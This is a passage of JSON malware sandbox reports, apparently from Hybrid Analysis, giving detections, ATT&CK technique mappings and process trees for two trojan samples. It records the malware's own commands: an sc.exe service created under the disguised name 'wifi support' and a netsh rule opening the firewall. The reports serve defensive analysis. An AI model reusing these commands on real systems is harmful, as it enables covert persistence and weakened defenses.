\"HELPERDLLNAME\"; Value: \"\")\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\"; Key: \"HOSTNAME\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "static-191", "relevance": 5, "name": "Calls an API used to open a process handle", "description": "Observed import api \"OpenProcess\" which can be \"used to open a process handle\" [Source: 2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d]", "origin": "Static Parser", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "api-49", "type": 6, "relevance": 10, "name": "Opens many files with write access (often indicator for full-system infection)", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d.exe\" opens more than 500 files with write access", "origin": "API Call", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has section name .text with entropy \"6.75466617180141\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has section name .rdata with entropy \"7.265642374028851\"\n \"2b6b9d4b3b21a7e37aa5f822e54ae9a987048d0ed55230894b95ebf94adcb45d\" has section name .reloc with entropy \"6.621288684865234\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "External Systems", "identifier": "suricata-1", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET INFO TLS Handshake Failure\" (SID: 2029340, Rev: 2, Severity: 2) categorized as \"Potentially Bad Traffic\"", "origin": "Suricata Alerts"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Environment Awareness", "identifier": "binary-8", "type": 8, "relevance": 5, "name": "The input sample contains a known anti-VM trick", "description": "Found VM detection artifact \"CPUID trick\" in \"sample.bin\" (Offset: 2861)", "origin": "Binary File", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a
https://hybrid-analysis.com/sample/3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a
Hybrid Analysis - Um_unhooking
{"size": 13229568, "type": "PE32 executable (GUI) Intel 80386, for MS Windows", "submit_name": "3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a", "sha256": "3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a", "av_detect": 88, "vx_family": "Trojan.BrsecmonE", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 9, "total_signatures": 239, "extracted_files": [{"name": "xagapalr.exe", "file_path": "%TEMP%\\xagapalr.exe", "file_size": 5242368, "sha256": "1fd12331245e2e359079bbf1cec78cc5e99c27822d34942c0abfbab755980378", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "runtime_process": "cmd.exe (PID: 3944)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "xagapalr.exe.67B73C88.bin", "file_size": 12983808, "sha256": "4a3faf45e2b38e974741a71ba77ddd6406425ee5fbadae37ac306023667683de", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .OBJ Files (COFF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24215)", "1 Unknown Objects (build: 24215)", "1 .BAS Files compiled with C2.EXE 5.0 (Visual Basic 6) (build: 24215)"], "imported_objects": ["5 .LIB Files generated with LIB.EXE 9.00 (Visual Studio 2008) (build: 30729)", "17 .OBJ Files (COFF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "30 .OBJ Files (OMF) linked with LINK.EXE 6.00 (Visual Studio 6) (build: 24123)", "18 .OBJ Files (OMF) linked with LINK.EXE 5.10 (Visual Studio 5) (build: 24123)"], "file_analysis": ["File contains Visual Basic code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 91}, "processes": [{"uid": "00000000-00002276", "name": "3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe", "normalized_path": "C:\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe", "sha256": "3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a", "av_label": "Trojan.BrsecmonE", "av_matched": 15, "av_total": 22}, {"uid": "00000000-00003608", "parentuid": "00000000-00002276", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C mkdir %WINDIR%\\system32\\iemwdxzd\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00003944", "parentuid": "00000000-00002276", "name": "cmd.exe", "normalized_path": "%WINDIR%\\System32\\cmd.exe", "command_line": "/C move /Y \"%TEMP%\\xagapalr.exe\" %WINDIR%\\system32\\iemwdxzd\\", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00004412", "parentuid": "00000000-00002276", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "create iemwdxzd binPath= \"%WINDIR%\\system32\\iemwdxzd\\xagapalr.exe /d\\\"C:\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\\\"\" type= own start= auto DisplayName= \"wifi support\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00003148", "parentuid": "00000000-00002276", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "description iemwdxzd \"wifi internet conection\"", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00004100", "parentuid": "00000000-00002276", "name": "sc.exe", "normalized_path": "%WINDIR%\\System32\\sc.exe", "command_line": "start iemwdxzd", "sha256": "1c2ec0bb83d2ad3f53b0706c46a2604f81f2fc2afdcf43be5914cc8f509dd48c"}, {"uid": "00000000-00000600", "parentuid": "00000000-00002276", "name": "netsh.exe", "normalized_path": "%WINDIR%\\System32\\netsh.exe", "command_line": "advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\system32\\svchost.exe\" enable=yes>nul", "sha256": "661f5d4ce4f0a6cb32669a43ce5deec6d5a9e19b2387f22c5012405e92169943"}, {"uid": "00000000-00004084", "name": "xagapalr.exe", "normalized_path": "%WINDIR%\\system32\\iemwdxzd\\xagapalr.exe", "command_line": "/d\"C:\\3fee4a0c6c66be70f7a2c21962cdba3f0fa8ae23dfbcd0b78f6778a13e15ce0a.exe\"", "sha256": "4a3faf45e2b38e974741a71ba77ddd6406425ee5fbadae37ac306023667683de"}, {"uid": "00000000-00004440", "parentuid": "00000000-00004084", "name": "svchost.exe", "normalized_path": "%WINDIR%\\system32\\svchost.exe", "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2"}], "mitre_attcks": [{"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 6, "informative_identifiers_count": 13}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 1, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 4, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Exploitation for Privilege Escalation", "attck_id": "T1068", "attck_id_wiki": "https://attack.mitre.org/techniques/T1068", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Kernel Modules and Extensions", "attck_id": "T1547.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/006", "malicious_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "suspicious_identifiers_count": 3, "informative_identifiers_count": 2, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "File and Directory Permissions Modification", "attck_id": "T1222", "attck_id_wiki": "https://attack.mitre.org/techniques/T1222", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Create Process with Token", "attck_id": "T1134.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 4, "suspicious_identifiers_count": 2, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Disable or Modify System Firewall", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Defense Evasion", "technique": "Portable Executable Injection", "attck_id": "T1055.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/002", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Process Hollowing", "attck_id": "T1055.012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/012", "malicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "NTFS File Attributes", "attck_id": "T1564.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/004", "suspicious_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Masquerade File Type", "attck_id": "T1036.008", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/008", "suspicious_identifiers_count": 1, "parent": {"technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal from Tools", "attck_id": "T1027.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/005", "informative_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 10}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 6, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "informative_identifiers_count": 4, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "Account Discovery", "attck_id": "T1087", "attck_id_wiki": "https://attack.mitre.org/techniques/T1087", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 3}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 2, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Checks", "attck_id": "T1497.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/001", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 3}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": 